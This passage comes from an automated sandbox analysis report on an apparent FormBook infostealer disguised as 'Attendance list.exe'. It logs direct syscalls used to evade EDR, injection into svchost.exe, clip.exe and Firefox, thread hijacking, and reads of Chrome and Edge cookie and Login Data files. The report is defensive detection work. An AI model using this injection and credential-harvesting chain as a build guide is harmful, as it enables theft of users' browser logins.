            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]2_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h]2_2_0366CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h]2_2_0365EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]2_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h]2_2_0366CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h]2_2_036BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]2_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h]2_2_03630AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]2_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]2_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h]2_2_03686AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h]2_2_03704A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h]2_2_03668A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov edx, dword ptr fs:[00000030h]2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h]2_2_036BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h]2_2_036B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704940 mov eax, dword ptr fs:[00000030h]2_2_03704940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B892A mov eax, dword ptr fs:[00000030h]2_2_036B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C892B mov eax, dword ptr fs:[00000030h]2_2_036C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h]2_2_036BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h]2_2_036BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h]2_2_036C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h]2_2_036649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h]2_2_036FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h]2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h]2_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660854 mov eax, dword ptr fs:[00000030h]2_2_03660854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_009181F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_009181F7
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008EA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008EA395
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008EA364 SetUnhandledExceptionFilter,0_2_008EA364

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Attendance list.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\clip.exeThread register set: target process: 2944Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Attendance list.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2AA1008Jump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00918C93 LogonUserW,0_2_00918C93
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008C3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008C3B4C
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008C4A35
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00924EC9 mouse_event,0_2_00924EC9
            Source: C:\Users\user\Desktop\Attendance list.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Attendance list.exe"Jump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_009181F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_009181F7
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00924C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00924C03
            Source: Attendance list.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000000.2093845001.00000000014D1000.00000002.00000001.00040000.00000000.sdmp, sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4462709781.00000000014D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: Attendance list.exe, sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000000.2093845001.00000000014D1000.00000002.00000001.00040000.00000000.sdmp, sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4462709781.00000000014D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000000.2093845001.00000000014D1000.00000002.00000001.00040000.00000000.sdmp, sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4462709781.00000000014D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000000.2093845001.00000000014D1000.00000002.00000001.00040000.00000000.sdmp, sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4462709781.00000000014D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008E886B cpuid 0_2_008E886B
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008F50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_008F50D7
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00902230 GetUserNameW,0_2_00902230
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008F418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_008F418A
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008C4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008C4AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462982503.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2180342193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4463119733.0000000004980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2181155888.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
